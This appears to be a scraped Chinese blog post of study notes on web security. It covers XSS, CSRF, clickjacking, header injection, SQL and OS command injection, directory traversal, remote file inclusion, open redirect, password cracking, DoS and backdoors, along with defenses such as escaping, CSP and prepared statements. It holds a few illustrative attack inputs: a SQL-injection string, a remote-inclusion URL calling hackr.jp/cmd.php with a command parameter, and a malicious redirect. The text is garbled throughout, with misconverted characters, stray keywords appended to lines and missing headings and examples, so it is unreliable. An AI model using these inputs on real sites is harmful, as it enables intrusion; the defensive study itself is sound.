简单的HTTP协议自己并不存在安全性问题,所以协议自己几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。php
web应用的攻击模式有如下两种前端
跨站脚本攻击(XSS)是指经过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。动态建立的HTML部分有可能隐藏着安全漏洞。就这样,攻击者编写脚本设下陷阱,用户在本身的浏览器上运行时,一不当心就会受到被动攻击。目的:利用网站漏洞从用户那里恶意盗取信息。web
XSS攻击,一般指黑客经过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,因此叫作“跨站脚本”。可是发展到今天,因为JavaScript的强大功能以及网站前端应用的复杂化,是否跨域已经再也不重要。可是因为历史缘由,XSS这个名字却一直保留下来。shell
从效果上来讲也是反射型XSS,单独划分出来,是由于DOM Based XSS的造成缘由比较特别,发现它的安全专家专门提出了这种类型的XSS。出于历史缘由,也就把它单独做为一个分类了。数据库
存储型 XSS 跟 反射型 XSS 的区别是:存储型 XSS 的恶意代码存在服务器上,反射型 XSS 的恶意代码存在 URL 里。它是最危险的一种跨站脚本。比反射性 XSS 和 DOM 型 XSS 都更有隐蔽性,由于它不须要用户手动触发。任何容许用户存储数据的 Web 程序均可能存在存储型 XSS 漏洞。若某个页面遭受存储型 XSS 攻击,全部访问该页面的用户都会被 XSS 攻击。segmentfault
其原理是检查 URL 和 DOM 中元素的相关性,但这并不能彻底防止反射型 XSS,并且也并非全部浏览器都支持 X-XSS-Protection。
X-XSS-Protection: 0
禁止XSS过滤。
X-XSS-Protection: 1
启用XSS过滤(一般浏览器是默认的)。 若是检测到跨站脚本攻击,浏览器将清除页面(删除不安全的部分)。
X-XSS-Protection: 1; mode=block
启用XSS过滤。 若是检测到攻击,浏览器将不会清除页面,而是阻止页面加载。
X-XSS-Protection: 1; report=<reporting-uri>
启用XSS过滤。 若是检测到跨站脚本攻击,浏览器将清除页面并使用CSP report-uri指令的功能发送违规报告。
复制代码
function escapeHTML(str) {
if (!str) return '';
str = str.replace(/&/g, "&");
str = str.replace(/</g, "<");
str = str.replace(/>/g, ">");
str = str.replace(/"/g, """); str = str.replace(/'/g, "'");
return str;
};
复制代码
过滤
在富文本中由于须要保留 HTML ,因此咱们不能使用转义的方法防护 XSS 攻击,这里使用过滤的方式防护 XSS 攻击,也就是经过只使用白名单容许的 HTML 标记及其属性,来防护攻击。后端
内容安全策略(csp)
实质是白名单策略,开发者明确告诉客户端,哪些外部资源能够加载和执行,大大加强了网页的安全性。跨域
叫作“攻击者伪造请求”,更好理解。浏览器
SameSite 属性
Cookie 的 SameSite 属性用来限制第三方 Cookie,从而减小安全风险,能够用来防止 CSRF 攻击和用户追踪。安全
同源检测
在 HTTP 协议中,每个异步请求都会携带两个 Header ,用于标记来源域名:
这两个 Header 在浏览器发起请求时,大多数状况会自动带上,而且不能由前端自定义内容。 服务器能够经过解析这两个 Header 中的域名,肯定请求的来源域。
经过校验请求的该字段,咱们能知道请求是不是从本站发出的。咱们能够经过拒绝非本站发出的请求,来避免了 CSRF 攻击。
点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe
,覆盖在一个网页上,而后诱使用户在该网页上进行操做,此时用户将在不知情的状况下点击透明的iframe
页面。经过调整iframe
页面的位置,能够诱使用户刚好点击在iframe
页面的一些功能性按钮上。
原理很简单:
z-index
属性让其位于最上层。opacity
属性让其透明度为0。点击劫持攻击与CSRF攻击(详见“跨站点请求伪造”一章)有殊途同归之妙,都是在用户不知情的状况下诱使用户完成一些动做。可是在CSRF攻击的过程当中,若是出现用户交互的页面,则攻击可能会没法顺利完成。与之相反的是,点击劫持没有这个顾虑,它利用的就是与用户产生交互的页面。
案例:
HTTP首部注入攻击(HTTP Header Injection)是指攻击者经过在响应首部字段内插入换行,添加任意响应首部或主体的一种攻击。属于被动攻击模式。
向首部主体内添加内容的攻击称为HTTP响应截断攻击(HTTP Response Splitting Attack)。
以下所示,Web应用有时会把从外部接收到的数值,赋给响应首部字段Location
和Set-Cookie
。
Loaction: http://www.example.com/a.cgi?q=12345
Set-Cookie: UID=12345
复制代码
注入攻击的本质,是把用户输入的数据当作代码执行。这里有两个关键条件,第一个是用户可以控制输入;第二个是本来程序要执行的代码,拼接了用户输入的数据。
所谓SQL注入,就是经过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它能够经过在Web表单中输入(恶意)SQL语句获得一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
SQL注入攻击指的是经过构建特殊的输入做为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,经过执行SQL语句进而执行攻击者所要的操做,其主要缘由是程序没有细致地过滤用户输入的数据,导致非法数据侵入系统。
好比先前的不少影视网站泄露VIP会员密码大多就是经过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.
(最佳方式)
使用预编译的SQL语句,SQL语句的语义不会发生改变。在SQL语句中,变量用?
表示,攻击者没法改变SQL的结构,在上面的例子中,即便攻击者插入相似于tom' or'1'='1
的字符串,也只会将此字符串当作username
来查询。
使用存储过程的效果和使用预编语句译相似,其区别就是存储过程须要先将SQL语句定义在数据库中。但须要注意的是,存储过程当中也可能会存在注入问题,所以应该尽可能避免在存储过程内使用动态的SQL语句。若是没法避免,则应该使用严格的输入过滤
或者是编码函数
来处理用户的输入数据。
检查输入数据的数据类型,在很大程度上能够对抗SQL注入。好比用户在输入邮箱时,必须严格按照邮箱的格式;输入时间、日期时,必须严格按照时间、日期的格式,等等,都能避免用户数据形成破坏。但数据类型检查并不是万能,若是需求就是须要用户提交字符串,好比一段短文,则须要依赖其余的方法防范SQL注入。
OS命令注入攻击(OS Command Injection)是指经过Web应用,执行非法的操做系统命令达到攻击的目的。只要在能调用Shell函数的地方就有存在被攻击的风险。
OS命令注入攻击能够向Shell发送命令,让Windows或Linux操做系统的命令行启动程序。也就是说,经过OS注入攻击可执行OS上安装着的各类程序。
目录遍历(Directory Traversal)攻击是指对本无心公开的文件目录,经过非法截断其目录路径后,达成访问目的的一种攻击。这种攻击有时也称为路径遍历(PathTraversal)攻击。
经过Web应用对文件处理操做时,在由外部指定文件名的处理存在疏漏的状况下,用户可以使用.../等相对路径定位到/etc/passed等绝对路径上,所以服务器上任意的文件或文件目录皆有可能被访问到。这样一来,就有可能非法浏览、篡改或删除Web服务器上的文件。
当然存在输出值转义的问题,但更应该关闭指定对任意文件名的访问权限。
远程文件包含漏洞(Remote File Inclusion)是指当部分脚本内容须要从其余文件读入时,攻击者利用指定外部服务器的URL充当依赖文件,让脚本读取以后,就可运行任意脚本的一种攻击。
这主要是PHP存在的安全漏洞,对PHP的include或require
来讲,这是一种可经过设定,指定外部服务器的URL做为文件名的功能。可是,该功能太危险,PHP5.2.0以后默认设定此功能无效。
当然存在输出值转义的问题,但更应控制对任意文件名的指定。
源代码:
http://example.com/foo.php?mod=news.php
通过攻击后:
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=1s
复制代码
攻击者经过把要引入的文件替换成本身的文件,就能攻击到服务器了。
不正确的错误消息处理(Error Handling Vulnerability)的安全漏洞是指,Web应用的错误信息内包含对攻击者有用的信息。与Web应用有关的主要错误信息以下所示。
Web应用没必要在用户的浏览画面上展示详细的错误消息。对攻击者来讲,详细的错误消息有可能给他们下一次攻击以提示。
开放重定向(Open Redirect)是一种对指定的任意URL做重定向跳转的功能。而与此功能相关联的安全漏洞是指,假如指定的重定向URL到某个具备恶意的Web网站,那么用户就会被诱导至那个Web网站。
原URL:
http://example.com/?redirect=http://www.tricorder.jp
被攻击后:
http://example.com/?redirect=http://hackr.jp
复制代码
用户看到URL后原觉得访问example.com,不料实际上被诱导至hackr.jp这个指定的重定向目标。
可信度高的Web网站若是开放重定向功能,则颇有可能被攻击者选中并用来做为钓鱼攻击的跳板。
密码破解攻击(Password Cracking)即算出密码,突破认证。攻击不只限于Web应用,还包括其余的系统(如FTP或SSH等)。有如下几种破解方法:
字典攻击中有一种利用其余Web网站已泄露的ID及密码列表进行的攻击。不少用户习惯随意地在多个Web网站使用同一套ID及密码,所以攻击会有至关高的成功概率
DoS攻击(Denial of Service attack)是一种让运行中的服务呈中止状态的攻击。有时也叫作服务中止攻击或拒绝服务攻击。DoS攻击的对象不只限于Web网站,还包括网络设备及服务器等。
有两种DOS攻击方式:
多台计算机发起的DoS攻击称为DDoS攻击(DistributedDenial of Service attack)。DDoS攻击一般利用那些感染病毒的计算机做为攻击者的攻击跳板。
后门程序(Backdoor)是指开发设置的隐藏入口,可不按正常步骤使用受限功能。利用后门程序就可以使用本来受限制的功能。
一般的后门程序分为如下3种类型。
可经过监视进程和通讯的状态发现被植入的后门程序。但设定在Web应用中的后门程序,因为和正常使用时区别不大,一般很难发现。
个人计算机网络学习之旅暂时就结束了。由于大四还在实习,白天还须要完成公司的任务,只能在晚上或者周末去公司自主学习,前先后后大约有花一两个月的时间。收获不少,这种感受与当初上计算机网络课的感受彻底不同,当时上了也就上了,知识都是零零散散的,都没有去串联起来,致使记得不深入。现在花了心思去整理总结后,有种融会贯通的感受,在Chrome调试,项目中先后端对接,性能优化方面的认知更为巩固和深入。